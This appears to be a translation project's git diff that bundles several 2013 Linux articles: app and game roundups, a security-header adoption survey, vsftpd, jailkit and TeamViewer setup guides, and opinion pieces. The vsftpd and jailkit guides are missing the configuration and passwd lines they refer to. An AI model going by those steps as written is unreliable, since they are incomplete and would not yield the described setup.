It’s been a busy year. Canonical continue to stride forwards towards a converged future for the OS, while an estimated 25 million people continue to use the regular desktop version for their day-to-day computing needs.
But key to both experiences are apps. Last year we rounded up 10 of our favourite apps that debuted on the desktop. This year we’re doing things a little differently by also including updates released during the course of the year.
We’ve opted to exclude ‘obvious’ choices like Firefox, Chrome, LibreOffice and Steam (because we all know they’re awesome anyway) to highlight lesser-known apps and utilities that, this year, made the desktop experience all the more awesome.
What did we pick? Read on.
### Geary ###
2013 saw Yorba, the non-profit behind Geary, try, [and fail][1], to secure a future for the app through crowd funding. That could’ve been where things ended for the app; a dour footnote in the history of apps failing to reach their true potential. Thankfully it wasn’t.
The release of Geary 0.4.x a few months after that disappointing set-up later proved a testament to the dedication and patience of its development team. Building on a strong release from earlier in the year, Geary 0.4 arrived in October with improved stability and performance and a veritable stuffed envelope of new improvements and features in tow.
Those who insist that the days of desktop mail clients are over are fast being made to eat their words by Yorba. Right now, Geary is one of the the best mail apps on any platform, Linux or otherwise.
- [Install Geary from Ubuntu Software Center][2]
### Birdie Twitter App ###
Twitter apps for Linux are a bit of an anomaly. While there are a good number of them, few seem to work as efficiently as proprietary apps on other operating systems. That all changed with the hatching of **Birdie** back in March of this year. As the year passed we got to see it grow from an unstable, crash-prone chick to a mature and confident app sure of its direction.
While it remains far from being the full plumed wonder I’d like, it makes this list because it does what it aims to, looks good doing it, and holds a lot of promise for the future.
- [Read more about Birdie’s Latest Release][3]
### Springseed ###
For obsessive note-takers 2013 wasn’t short of options – from GNOME’s obtusely named *Bijiben*, to the powerful *Nitro*. But, for me, it was the nimble *Springseed* that grabbed my attention.
Having been built from the ground-up to be resource-friendly, the app feels responsive and light. The feature set includes all of the vital ones needed to get organised – notebook creation, text formatting, markdown support and drobox sync, etc – all presented within an attractive interface that’s free of needless cruft.
Springseed is a free and open-source and available to download directly from the project website.
- [Download Springseed for Ubuntu][4]
### Unity Tweak Tool ###
First released in the beginning of the year, *Unity Tweak Tool* has grown to become the ’*must have*’ app name falling off the lips of anyone offering post-Ubuntu install advice. With a smorgasbord of settings and customisation tools on-hand, the utility makes tailoring the Unity experience to suit your own tastes a [doddle][5].
Routinely updated to take advantage of the latest options in each new release of Ubuntu, and offering the safety net of an ‘undo’ button should anything go wayward, it’s easy to see why the app has become a favourite tool for so many.
- [Install Unity Tweak Tool on Ubuntu][6]
### Intel Graphics Driver Installer ###
Intel (specifically Intel’s *Open Source Technology Centre*) made installing the latest and greatest Intel graphics drivers easier on Linux this year with the release of the Intel Driver Manager. The utility automate the entire detection, download and install process for the user, requiring only a couple of clicks and the bit of patience.
Initial releases of the manager were not without issue. Thankfully, subsequent releases have seen bugs fixed and quirks ironed out. If you tried it earlier in the year without success it might be well worth trying it again.
- [Intel Driver Manager for Linux][7]
### Ubuntu SDK ###
A left-field choice, but an important one. The Ubuntu SDK arrived this year primed with everything developers need to create apps for Ubuntu Touch, both on phone and tablet.
It’s hard to wax too lyrical about a tool that few desktop users will appreciate, but July’s update in particular added some great functionality – including a unified actions API, Ubuntu One database syncing and support for creating converged layouts.
- [Learn more about the Ubuntu SDK][8]
### VoD Enablement App ###
Arguably this entry is not so much an app as a hack dressed up to look like one. Regardless, thanks to some clever packaging foo of Erich Hoover, Netflix, LoveFilm and a host of other Silverlight-based video streaming sites are now *easily* viewable on Ubuntu for the first time – albeit unofficially, of course!
For the full skinny on what’s supported, what it install, and how to get it you’ll want to check out our article from January.
- [How to Watch Netflix & Others on Ubuntu][9]
### VLC ###
Everyone’s (cue someone saying ‘not mine!’ – ed) favourite media player received a number of updates over the course of 2013, with its most recent major update landing back in September.
Amongst the slew of features and refinements shipped with its Linux build was support for 4K video streams; VDPAU hardware decoding; tweaks to .MKV file playback and improved DBus and MPRIS interfaces.
### Lightworks for Linux ###
Lightworks has an odd, but rather brilliant, claim to fame: it’s too featured, too powerful, and too professional-orientated for most desktop users to get to grips with. Addmittedly that’s hardly a shock given the pedigree of the app (used to edit many an Oscar-winning Hollywood film, dontcha’ know).
Editshare, the company behind the app, took their time publishing a Linux Beta (having delayed its arrival on numerous occasions). But, since its release back in April, they’ve been fastidious in ensuring that it maintains feature parity with the Windows builds – a feat only achieved in the most recent set of updates.
Now, with new features and tweaks arriving by the week, there’s never been a better time for those who fancy themselves as the next great movie maker to try it out.
- [Latest Lightworks for Linux Update][10]
### GNOME Music Preview ###
Alright, alright: it’s not finished. In fact, if you’re not running a pair of highly unstable GNOME PPAs you can’t even use it in Ubuntu.
But that’s beside the point; GNOME Music is one of my stand out apps of this year. For some it’s simple to the point of uselessness, for others the beauty lies in its simplicity. Sure, it doesn’t stack up well against apps tasked with doing ‘all the things!’, but that rather misses the point.
The attention to detail in design and user experience is second to none.
via: http://www.omgubuntu.co.uk/2013/12/top-10-linux-apps-of-2013
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Security Headers on the Top 1,000,000 Websites: November 2013 Report
It has been almost exactly a year since we conducted the first top 1 million security headers report so it is a great time to re-run the analysis and see how well security header adoption is growing. As before, the latest Chrome and Firefox User-Agent strings were used to make requests to the top 1 million sites over both HTTP and HTTPS. Out of the 2,589,918 responses we had over 100,000 distinct security headers and values to analyze.
Comparing with previous scans, we had 514,288 URLs that matched the first run we did in November 2012 and 1,207,169 URLs that matched from March 2013. This time around we added yet another security header “X-XSS-Protection” due to a request from a commenter on this blog. Unfortunately, we did not store this header in any of the prior scans so we are unable to compare its adoption rate.
### Changes, Additions and Removals Yearly Review ###
A total of 7,258 new security headers were added over the course of a year to the 514,288 URLs that existed in both data sets. As before, we see the largest increase in additions to X-Frame-Options and CORS headers. In a not so distant fourth we see Strict-Transport-Security steadily climbing with 538 new sites using the header. Even though X-Content-Security-Policy and X-WebKit-CSP are deprecated, we still see a small increase in their additions. Once again the highest used headers also end up having the highest number of removals with X-Frame-Options being removed from 365 sites over the course of the year.
You may notice that the Content-Security-Policy header is missing from the yearly review, this is because it was not standardized when we first started this analysis. To see the adoption rate of the standardized CSP, we need to look at a comparison of the scan that was conducted in March 2013.
### Changes, Additions and Removals from March 2013 ###
We have a lot more URLs that matched since last March, yet surprisingly, the charts look extremely similar. 7,099 new security headers were added for the 1,207,169 URLs that matched between this run and March 2013. Of these sites, a disappointingly small number of 62 sites enabled Content-Security-Policy with 47 sites enabling the soon to be disabled X-Content-Security-Policy header.
While it would be nice to see CSP’s adoption rates increase more, it is quite understandable as it is such a large undertaking for any website to create a compliant policy.
### November 2013 Results ###
#### X-XSS-Protection ####
This time around another header was added to the analysis. The Microsoft endorsed header was built to allow sites to control how Internet Explorer’s XSS Filtering feature is to be handled on a resource by resource basis. Valid values for X-XSS-Protection are as follows:
1. 0 – Disables XSS protections
1. 1 – Enables XSS protections, in IE the filter will attempt to sanitize potential malicious characters.
1. 1; mode=block – Enables XSS protections and instructs IE to block the response instead of sanitizing.
1. 1; report=[url] – Allows reports to be sent to the specified URL of potential XSS attempts.
It should be noted that Google Chrome’s XSS Auditor will also be disabled if a resource responds with 0 as the value for the X-XSS-Protection header.
As previous readers will remember, invalid header values are a serious problem and X-XSS-Protection is no exception. Almost 480 sites incorrectly specified the value of “0; mode=block”. This means that 477 sites who think they are blocking XSS attacks are actively disabling the XSS protections built in to IE and Chrome. Please note that [YouTube][1] and [Blogspot][2] make up the majority of URLs using X-XSS-Protection with 14,210 for YouTube and 18,587 for Blogspot.
### X-Frame-Options ###
X-Frame-Options is still holding strong with SAMEORIGIN being by far the largest setting with YouTube again taking up the majority with 14,178 URLs all of which are set to SAMEORIGIN. Along with the jump in sites using X-Frame-Options we are also seeing an increase in invalid values being configured.
### Cross Origin Request Sharing (CORS) Headers ###
Once again we looked at the two CORS headers Access-Control-Allow-Origin and Access-Control-Allow-Credentials.
Unfortunately, we are still seeing a large number of sites incorrectly configuring Access-Control-Allow-Origin by specifying wildcards or multiple origins separated by various characters. As a reminder Access-Control-Allow-Origin only allows either * (wildcard value) or a single origin with a valid scheme specified.
As for Access-Control-Allow-Credentials, 1388 sites have set the value to true, 51 for false. Surprisingly, we identified 196 sites setting wildcard origin access but setting Access-Control-Allow-Credentials to true which is an invalid combination of settings.
### Strict-Transport-Security ###
Due to readers suggestions we have changed the long max-age value to be anything greater than 604800 seconds, or 7 days. Likewise, values below are considered to be a short max-age. [Facebook][3] and [Etsy][4] comprise 74 and 61 URLs respectively in the Max Age of 0 column. As a reminder, a header value of 0 clears the domain from the browser’s Strict Transport Security cache. Of the more interesting invalid values, a large number of sites incorrectly use ‘,’ as a delimiter between the max-age value and includeSubDomains directives. Unfortunately, both Firefox and Chrome are extremely strict in this regard and will refuse to add the site to the STS cache if the ‘,’ character is used instead of the RFC defined token of ‘;’. Once again, please check the RFCs before implementing any of these security headers.
#### Content-Security-Policy ####
Content Security Policy continues to grow in usage but extremely slowly. Only 269 sites are using the [w3 specification’s Content-Security-Policy][5] header, with 95 of these URLs coming from Facebook. Interestingly, 584 sites are using X-Content-Security-Policy and 487 sites are using X-Webkit-CSP. It should be noted that these two headers are already considered deprecated but have yet to be disabled. Only an extremely small number of sites using the report-only versions of the CSP headers were observed. It would be expected that web site operators wishing to test out CSP would use the report only mode to determine how Content Security Policy would impact their site, yet we only see 24 sites using Content-Security-Policy-Report-Only.
The most interesting result of the CSP analysis is the large number of sites which use CSP with the unsafe directives. It is assumed the reason unsafe-inline has such a high rate of usage is due to how extremely hard it is for developers to remove all inline script from web page elements. While disappointing to see, it is understandable to anyone who has attempted to enact a strict CSP policy.
### Conclusion ###
It is safe to say that we have a long way to go to making sure our sites use all available means to protect themselves. While security headers are only a small part of defense, applied appropriately they can and do help us all be more secure internet users. While encouraging to see the numbers increasing, we must keep in mind that less than 10% (199,350) of the 2,589,918 URLs analyzed have security headers. While strict adherence to RFCs is necessary, typos, combined with the rigidness of directive parsing, do not help site administrators or users when encountering these headers. While hope should not be given up on CSP, it’s extremely low adoption rate is rather concerning and it may be worth considering creation of tools to help create, verify and support site administrators that wish to adopt CSP.
As before, Veracode has released the raw data from this analysis, so feel free to download the November 2013 results here.
via: http://www.veracode.com/blog/2013/11/security-headers-on-the-top-1000000-websites-november-2013-report/
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Senior researchers analyzed LibreOffice with interesting conclusions
Users, editors, state departments, teams and city administrations are enjoying [LibreOffice][1], free open-source office suite proving itself a clear success across the globe with more and more adoptions, more and more positive feedback.
While the users perceive LibreOffice as no-compromise and powerful, it seems that serious researchers have also found and described LibreOffice as a true success, as in the case of the "**Sustainability of Open Source software communities beyond a fork: How and why has the LibreOffice project evolved?**" document, too.
Essentially, "Sustainability of Open Source software communities beyond a fork: How and why has the LibreOffice project evolved?" is a research document [focused][2] on LibreOffice and its components, ranging from status to public perception, future capabilities, ability to attract supporters and contributors.
The conclusions of the mentioned document, while natural, talk about LibreOffice as a success on all fronts, conclusions such as:
- "The LibreOffice project, which was forked from the OpenOffice.org project, shows no sign of
- long-term decline"
- "LibreOffice has attracted the long-term and most active committers in OpenOffice.org"
- "Open Source communities can outlive Open Source software projects"
- "LibreOffice is perceived by its community as supportive, diversified, and independent"
The serious 60-pages-long document (available for download on [http://www.sciencedirect.com/science/article/pii/S0164121213002744/pdfft...][3]) presents LibreOffice as detailed, being an in-depth accurate analysis of the robust office suite, document written by senior researchers from the University of Skövde’s Informatics Research Centre.
via: http://iloveubuntu.net/senior-researchers-analyzed-libreoffice-interesting-conclusions
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@ -1,4 +1,3 @@
Crowner's crown
Setup Apache 2.4 and Php FPM with mod proxy fcgi on Ubuntu 13.10
### mod_proxy_fcgi ###
@ -206,4 +205,4 @@ via: http://www.binarytides.com/setup-apache-php-fpm-mod-proxy-fcgi-ubuntu/
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@ -1,189 +0,0 @@
Setup FTP Server On openSUSE 13.1
**vsftpd** (**V**ery **S**ecure **F**ile **T**ransport **P**rotocol **D**aemon) is a secure, fast FTP server for Unix/Linux systems. In this how-to article, let us see how to setup a basic FTP server using vsftpd on openSUSE 13.1.
### Install vsftpd ###
Login as root user and Enter the following the following command.
# zypper in vsftpd
Start vsftpd service and make it to start automatically on every reboot.
# systemctl enable vsftpd.service
# systemctl start vsftpd.service
### Configure vsftpd ###
Create a folder for ftp users.
# mkdir /srv/ftp
Create a group called **ftp-users**.
# groupadd ftp-users
Let us create a sample user called unixmen with home directory **/srv/ftp** and group **ftp-users**.
# useradd -g ftp-users -d /srv/ftp/ unixmen
Set password for the new user.
# passwd unixmen
Make the ftp home directory **/srv/ftp/** accessible by ftp users.
# chmod 750 /srv/ftp/
# chown unixmen:ftp-users /srv/ftp/
Edit file vsftpd.conf,
# nano /etc/vsftpd.conf
Make the changes as shown below.
#Uncomment and Set YES to enable write.
# Uncomment and Set banner name for your website
ftpd_banner=Welcome to Unixmen FTP service.
# Uncomment
# Uncomment and set YES to allow local users to log in.
# To disable anonymous access, set NO.
# Uncomment to enable ascii download and upload.
## Add at the end of this file ##
Save and exit file.
### Test FTP Server Locally ###
First let us try to login to our FTP server as shown below.
# ftp localhost
Trying ::1:21 ...
Connected to localhost.
220 (vsFTPd 3.0.2)
Name (localhost:root): unixmen
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
As you in the above output, we will be able to login to ftp server using unixmen user.
### Test FTP Server Remotely ###
By default openSUSE built-in firewall won’t allow to login to FTP from remote systems. So let us allow vsftpd service through suse firewall. To do that go to **Yast -> Security and Users -> Firewall**.
In the Firewall section, go to **Allowed Services**. In the zone selection drop down box, select **External Zone** and in Service to Allow drop-down box, select **vsftpd server** and click add.
Click Next and close Yast Control center.
Now try to connect from a remote system.
I tried to login to FTP server from my ubuntu desktop.
sk@sk:~$ ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( unixmen
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
As you see in the above output, I will be able to connect to FTP server. If you doesn’t allow the vsftpd service through firewall you will get a Connection timed out error.
### Connect from Browser ###
Open up your browser and Navigate to **ftp://ip-address/**. Enter the ftp user name and password.
### Connect to FTP server using FileZilla ###
Working from command-line mode might be little bit annoying to newbies. So let us install a graphical FTP client called [**Filezilla**][1] to get things done quite easier:
Mostly all distribution will have filezilla client in their official repository. To install filezilla on Linux based systems enter the following command:
On Ubuntu based systems:
$ sudo apt-get install filezilla
On Fedora/Redhat systems:
$ sudo yum install filezilla
On openSUSE:
# zypper in filezilla
After installing filezilla open it. Enter the ftp server IP address, user name and password and click quickconnect.
For added security, you can restrict FTP access to certain users by adding them to **/etc/vsftpd.chroot_list** file.
Edit vsftpd.conf file,
nano /etc/vsftpd.conf
Make the changes as shown below.
# Uncomment and set YES
Create **file /etc/vsftpd.chroot_list**,
nano /etc/vsftpd.chroot_list
Add the users that you want to give access to FTP server. I added the user **unixmen**.
Restart ftp service.
# systemctl restart vsftpd.service
Now you will be able to connect to FTP server with users who are listed in the chroot list file.
If users other than in the chroot list want to access FTP server, they will get the following error.
500 OOPS: could not read chroot() list file:/etc/vsftpd.chroot_list
ftp: Login failed
That’s it for now. Your FTP server is ready to use. Enjoy!
via: http://www.unixmen.com/setup-ftp-server-opensuse-13-1/
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@ -1,221 +0,0 @@
我不入监狱 谁入监狱
Setup a jailed shell with jailkit on ubuntu
### Jailed Shell and Jailkit ###
A jailed shell is a kind of limited shell that provides the user with a very real looking shell but does not allow him to mess with/view/modify any parts of the real file systems. The file system inside the shell is different from the actual file system of the underlying system. Such a functionality is achived through chroot and finds many kinds of applications. For example to setup a linux shell for users to just "play with". Or run some program with full functionality but in a limited environment and so on.
In this tutorial we are going to talk about setting up a jailed shell quickly with jailkit on ubuntu. Jailkit is helper program that allows to quickly setup a jailed shell, jail users inside it, and configure programs to run from the jailed environment.
Jailkit can be downloaded from [http://olivier.sessink.nl/jailkit/][1]
We have already discussed about installing jailkit on ubuntu so check out that post.
### Setup jailed shell ###
#### 1. Setup the jail environment ####
There needs to be a directory where the whole jail environment will be setup. Lets do it in /opt/jail. This can be whatever.
$ sudo mkdir /opt/jail
Root should own this directory. So chown it out.
$ sudo chown root:root /opt/jail
#### 2. Setup the programs to make available inside the jail ####
All the programs that need to be available in the jail need to be copied inside it using the jk_init command.
$ sudo jk_init -v /jail basicshell
$ sudo jk_init -v /jail editors
$ sudo jk_init -v /jail extendedshell
$ sudo jk_init -v /jail netutils
$ sudo jk_init -v /jail ssh
$ sudo jk_init -v /jail sftp
$ sudo jk_init -v /jail jk_lsh
Or at one go
$ sudo jk_init -v /opt/jail netutils basicshell jk_lsh openvpn ssh sftp
The names like basicshell , editors , netutils are groups that contain multiple programs. Each group is a set of executable files, libraries etc to be copied into the shell. For example, the section **basicshell** provides many programs like bash, ls, cat, chmod, mkdir, cp, cpio, date, dd, echo, egrep etc in the jail.
For a complete list of sections that can be setup, have a look at /etc/jailkit/jk_init.ini.
jk_lsh (Jailkit limited shell) - is an important section, and must be added.
#### 3. Create the user who will be jailed ####
Need a user to put inside the jail. Lets create one
$ sudo adduser robber
Adding user `robber' ...
Adding new group `robber' (1005) ...
Adding new user `robber' (1006) with group `robber' ...
Creating home directory `/home/robber' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for robber
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
Note that this is a normal user who is created in the actual filesystem and not inside the jail.
In the next step this user shall be imprisoned inside the jail.
At this point if you take a look at /etc/passwd you get to see an entry at the end that looks like this
This is our new user and the last part /bin/bash indicates that the user has a normal shell access on the system, if he logs in.
#### 4. Jail the user ####
Now its time to put the user inside the jail.
$ sudo jk_jailuser -m -j /opt/jail/ robber
By doing this the user robber has now been jailed.
Now if you take a look at /etc/passwd the last entry would look like this
Note that the last 2 parts that indicate the home user and the shell type have changed. The home directory of the user is now inside the jail environment at /opt/jail. The shell of the user is now a special program called jk_chrootsh that will provide the jailed shell.
It is this particular shell called jk_chrootsh that takes the user inside the jail, everytime he logs onto the system.
The jail setup by now is nearly done. But if you try to connect to id from ssh, it will fail like this :
$ ssh robber@localhost
robber@localhost's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
13 packages can be updated.
0 updates are security updates.
*** /dev/sda7 will be checked for errors at next reboot ***
*** /dev/sda8 will be checked for errors at next reboot ***
Last login: Sat Jun 23 12:45:13 2012 from localhost
Connection to localhost closed.
The connection shall close. This happens because the user actually has a limited shell.
#### 5. Give bash shell to user inside the jail ####
The next important thing to do is to give the user a proper bash shell, but inside the jail.
Open the following file
Its the password file inside the jail. It would look somewhat like this
Change the /usr/sbin/jk_lsh to /bin/bash
Save the file and exit.
#### 6. Login to the jail ####
So now its time to login into the jail again
$ ssh robber@localhost
robber@localhost's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-25-generic x86_64)
* Documentation: https://help.ubuntu.com/
13 packages can be updated.
0 updates are security updates.
*** /dev/sda7 will be checked for errors at next reboot ***
*** /dev/sda8 will be checked for errors at next reboot ***
Last login: Sat Jun 23 12:46:01 2012 from localhost
bash: groups: command not found
I have no name!@desktop:~$
The jail says 'I have no name!' , ha ha. Now we have a fully functional bash shell but inside the jail.
Now check the environment by moving around. The root / of the jailed environment is /opt/jail of the real file system. But its only we who knows that, not the jailed user.
I have no name!@desktop:~$ cd /
I have no name!@desktop:/$ ls
bin dev etc home lib lib64 run usr var
I have no name!@desktop:/$
Also only the commands that were copied via jk_cp sections will be available in this jail.
If the login fails, then check /var/log/auth.log for error messages.
Now try running some network command like wget or anything similar.
$ wget http://www.google.com/
If you get an error like this :
$ wget http://www.google.com/
--2012-06-23 12:56:43-- http://www.google.com/
Resolving www.google.com (www.google.com)... failed: Name or service not known.
wget: unable to resolve host address `www.google.com'
Fix it by running the following 2 commands :
$ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_files.so.2
$ sudo jk_cp -v -j /opt/jail /lib/x86_64-linux-gnu/libnss_dns.so.2
The exact location of the libnss_files.so and libnss_dns.so can vary so check.
### Running programs or services in the jail ###
Now the setup is complete. Jails are useful to run programs or services in a restricted/secure environments. To launch a program or daemon inside the jail use the **jk_chrootlaunch** command.
$ sudo jk_chrootlaunch -j /opt/jail -u robber -x /some/command/in/jail
The jk_chrootlaunch utility can be used to launch a particular process inside the jail environment with privileges of the specified user. If the daemon fails to start, check /var/log/syslog for error messages.
To run the program inside the jail, the program must first be fully copied inside the jail using the jk_cp command.
jk_cp - a utility to copy files including permissions and libraries into a jail
For further reading about various jailkit commands, check the documentation at [http://olivier.sessink.nl/jailkit/][1]
via: http://www.binarytides.com/setup-jailed-shell-jailkit-ubuntu/
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@ -0,0 +1,76 @@
Software May Be Eating The World, But Open Source Software Is Eating Itself
**Nothing sits still for long in the world of open source.**
Software may be eating the world, as [Marc Andreessen posits][1], but open-source software seems to be eating itself. And at a far faster clip. While the software world has grown used to products and their vendors dominating for long stretches (think: Microsoft in operating systems and Oracle in databases), the new world of open source is moving at an accelerated, Darwinian pace, leaving no project to rest on its laurels.
In this fast-changing open source world, how should enterprises decide where to invest?
### Open Source Picks Up The Pace ###
Though [Dirk Riehle's analysis][2] of the total growth in open source projects is a few years old, if anything the trend he plots has [accelerated][3]:
Today much of the interesting code in technology’s most important markets—Big Data, cloud, mobile—is open source. With more activity focused on areas like Hadoop or OpenStack, we should expect the pace and volume of open code creation to increase.
Which may be good or bad.
### No Rest For The Open Source Developer ###
Take, for example, the configuration management market. Redmonk’s Stephen O’Grady sifts a number of data sources that measure the popularity of Chef, Puppet, Ansible and Salt, the latter two being very new to the market, yet demonstrating considerable community enthusiasm and adoption.
This prompts O’Grady to [speculate][4] that “Where it once was reasonable to conclude that the configuration management space would evolve in similar fashion to the open source relational database market—i.e. with two dominant projects—that future is now in question.”
O’Grady goes on to suggest:
> The most interesting conclusion to be taken from this brief look at a variety of community data sources, however, may well be the relevance of both Ansible and Salt. That these projects appear to have viable prospects in front of them speaks to the demand for solutions in the area, as well as the strong influence of personal preferences—e.g. the affinity for Salt amongst Python developers.
Actually, I’d argue that the most interesting conclusion is that no open-source project has guaranteed longevity. Puppet came out in 2005 and is still making headway against entrenched proprietary incumbents, yet now it has to fight off Chef (which came out four years later), Ansible (last two years) and Salt (last two years).
Yes, incumbents in any important market, proprietary or otherwise, will always have new market entrants nibbling at their heels. But in open source, the competition doesn’t wait for billion-dollar markets to form before it launches attacks. The rise of Salt and Ansible in a market already well-served by Chef and Puppet is a testament to this.
### The Community Giveth, And The Community Taketh Away ###
You will find this same dynamic in content management (Drupal vs. Joomla vs. Alfresco vs. Wordpress vs. countless other CMSes), cloud (Eucalyptus vs. OpenStack vs. CloudStack vs. CloudFoundry vs. OpenShift vs. many others), [web servers][5] and databases, both relational and NoSQL.
The ranks of open-source databases swell with new entrants almost daily, as can be seen on the [DB-Engines database tracking service][6]. Perhaps most interesting is the open-source relational database market. Up until recently, MySQL dominated that market. Postgres was a viable runner up to MySQL, but it was a very distant second.
Today things are in motion. Or commotion. Largely due to Oracle’s alleged fumbling of the MySQL community, Postgres is on a tear, booming even with the hipster crowd that welcomed MySQL. But so is MariaDB. Though still a comparative gnat, leading [Linux distributions like Red Hat’s Fedora and Ubuntu have embraced MariaDB][7], as has Google, replacing MySQL.
Perhaps, as O’Grady implies, this comes down to developer preferences. If developers rule, then little impedes them from switching to new projects that may fit their needs better, throwing a given market into disarray. If this is correct, it would explain why open source resists long term monopolies:
It’s hard to keep developers happy.
### Building A Community-Friendly Business ###
What does this mean for enterprises that are looking to make long-term investments on a given open-source project? An easy, if unsatisfying, answer is that enterprises should contribute to the projects they care about, ensuring their sustainability as well as giving the enterprise the ability to support themselves should the project dwindle.
But most enterprises don’t want to have to code the winner themselves.
Instead they should look for popular projects that are good technical fits for their enterprise requirements and that have strong communities. Popularity can be fleeting if a project grows callous to its community. One of the primary reasons Linux has endured so long at the top of the operating system heap is that it has been so accommodating to community influence and requirements.
Unfortunately, there’s no One True Way to measure vitality in an open source community. Some successful projects, like OpenStack, lean on a strong foundation. Others, like Linux, depend upon a strong individual and her lieutenants.
But all successful open-source projects that maintain their lead innovate quickly, with regular releases every few months. While a fast-moving project may be more difficult for enterprises to support, it may also be a key indication that the project will remain relevant.
How else should enterprises hedge against the risk of obsolescence of an open-source project?
Lede image courtesy of [Shutterstock][8].
via: http://readwrite.com/2013/12/12/open-source-innovation
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@ -1,38 +0,0 @@
SuperTuxKart 0.8.1 Release Candidate Revved Up And Ready for Testing
**Hands up if you don’t like open-source racing game SuperTuxKart? You, folks, are strange.**
As kart-racers go, it’s one of the most popular freely available. And for good reason: it’s fun, easy to play and has a dedicated team of developers who are continually adding to and improving what is already a really polished game.
But it’s getting even better. The first release candidate of build 0.8.1 – the first update since last year’s 0.8 build – [has been made available for testing][1] (for ‘testing’ see ‘excuse to play it for hours and not feel guilty’).
SuperTuxKart 0.8.1 adds a number of improvements, including:
- A new Star Trek themed track “STK Enterprise”
- Three tracks updated (‘Old Mines’, ‘Lighthouse’ & ‘Zen Garden’)
- New ‘Egg Hunt’ and ‘Soccer’ modes
- New and updated karts
- New difficulty level
- Bubblegum shield weapon
- Option to save and resume Grand Prix mode
- [WiiMote Support][2]
### Geting SuperTuxKart 0.8.1 ###
No release date has been given on when to expect the final, stable release of 0.8.1 but I’d expect it to land sometime in December – marking one year from the previous release in the 0.8.x series.
In the meantime, if you’re okay with “Release Candidate”-quality software, you’ll find a pre-compiled binary for Linux over on the project’s Sourceforge Page.
- [Download SuperTuxKart 0.8.1 Release Candidate][3]
via: http://www.omgubuntu.co.uk/2013/11/supertux-kart-0-8-1-release-candidate
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@ -0,0 +1,100 @@
(翻译中 by runningwater)
TeamViewer 9 Released – Install on RHEL/CentOS/Fedora and Debian/Ubuntu
This guide shows how to install **Teamviewer 9** on **RedHat, CentOS, Fedora** and **Debian**, **Ubuntu**, **Linux Mint**, **Xubuntu** systems. **Teamviewer** is a one of the most popular application for remote assistant, Desktop sharing or transferring files between computers, web conferencing and online meetings etc. Teamviewer is a proprietary application.
However, it’s a freeware for personal use. Teamviewer is available for **Windows, Linux, Mac OS, Android** and **iPhone**. Teamviewer uses **WINE** application which is integrated within it. We don’t have to [install WINE application][1]separately. **Teamviewer** is not a native **Linux** application.
Recently, the latest stable version of **TeamViewer 9** released with new features and many improvements. Following are some of the new features are added in **TeamViewer 9** which are highlighted below:
### Features for Windows, Linux and Mac ###
- Open multiple connections in different tabs
- Support for Wake-on-LAN
- Added two factor authentication for TeamViewer accounts
- Support for Windows 8.1 and Mac OS X Mavericks
- Save custom modules such as QuickSupport, QuickJoin, etc.
- API Integration
- Stronger security of the Teamviewer account
- Quick connection via desktop shortcut
- Visual notification
- Copy and paste files and text between computers
- Initiating file transfers to computers
- Quick connection via desktop shortcut
- Faster video transfers
### How do I Install Teamviewer 9 on RedHat, CentOS, Fedora ###
You may download package for rpm based Linux distributions at [teamviewer_linux.rpm][2].
Let us start installation. Go to the directory from where you have downloaded package and execute following yum command to install it. It will install missing dependencies.
# wget http://www.teamviewer.com/download/teamviewer_linux.rpm
# yum install teamviewer_linux.rpm
If you get missing public key error, you can download public key and import it using the following command.
# wget http://www.teamviewer.com/link/?url=354858
# rpm --import TeamViewer_Linux_PubKey.asc
After importing the public key, please run the “**yum install**” command again to install the Teamviewer rpm.
To start Teamviewer application, run the following command from the terminal.
# teamviewer
Teamviewer application running on my **Fedora 18** system.
![Running TeamViewer in Fedora 18](http://www.tecmint.com/wp-content/uploads/2013/02/f-t3.jpg)
*Running TeamViewer in Fedora 18*
### How do I Install Teamviewer 9 on Ubuntu, Linux Mint, Xubuntu ###
You may download teamviewer package for **32-bit** or **64-bit** systems at [teamviewer linux .deb][3] packages. or you can download the package using **wget** command as shown below.
## 32 Bit System ##
$ sudo wget http://www.teamviewer.com/download/teamviewer_linux.deb
## 64 Bit System ##
$ sudo wget http://www.teamviewer.com/download/teamviewer_linux_x64.deb
Once you’ve downloaded the package, go to the directory where you’ve downloaded Teamviewer package and run the following command to install it.
## 32 Bit System ##
$ sudo dpkg -i teamviewer_linux.deb
## 64 Bit System ##
$ sudo dpkg -i teamviewer_linux_x64.deb
If you get missing dependencies error, please use the following command to install those dependencies.
sudo apt-get install -f
Once installation is done. To start Teamviewer package on **Ubuntu** Linux, go to **Dash Home** and type **teamviewer** and click on **teamviewer** icon to run application.
![Running TeamViewer in Ubuntu 13.10](http://www.tecmint.com/wp-content/uploads/2013/02/u-t1.png)
*Running TeamViewer in Ubuntu 13.10*
Teamviewer application running on my **Ubuntu 13.10** system.
![TeamViewer 9 Under Ubuntu 13.10](http://www.tecmint.com/wp-content/uploads/2013/02/u-t2.jpg)
*TeamViewer 9 Under Ubuntu 13.10*
To start on **Linux Mint**, Go to **Menu >> Internet >> Teamviewer** and click on **Accept License Agreement** to run application.
Teamviewer application running on my **Linux Mint 15**.
![Running TeamViewer in Linux Mint 15](http://www.tecmint.com/wp-content/uploads/2013/02/m-t5.png)
*Running TeamViewer in Linux Mint 15*
via: http://www.tecmint.com/how-to-install-teamviewer-on-linux-distributions/
译者:[runningwater](https://github.com/runningwater) 校对:[校对者ID](https://github.com/校对者ID)
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sources/Top 10 Linux Games of 2013.md
Normal file
sources/Top 10 Linux Games of 2013.md
Normal file
@ -0,0 +1,157 @@
Top 10 Linux Games of 2013
**With 2013 wrapping up, we’ve brought together 10 of our favourite Linux games of the past year.**
2013 was a huge year for Linux gaming with Valve’s continued commitment to the platform, encouraging words from big studios like Battlefield developers [DICE][1], and Creative Assembly’s commitment to bringing Total War: Rome II to [Linux next year][2].
Our list contains both indie titles and some of the most influential AAA titles to date. **This list isn’t intended to be comprehensive nor anything other than our opinion.**
All of the titles are available on Steam and/or the Ubuntu Software Center, so get your wallets and purses and prepare to throw some money at your screen!
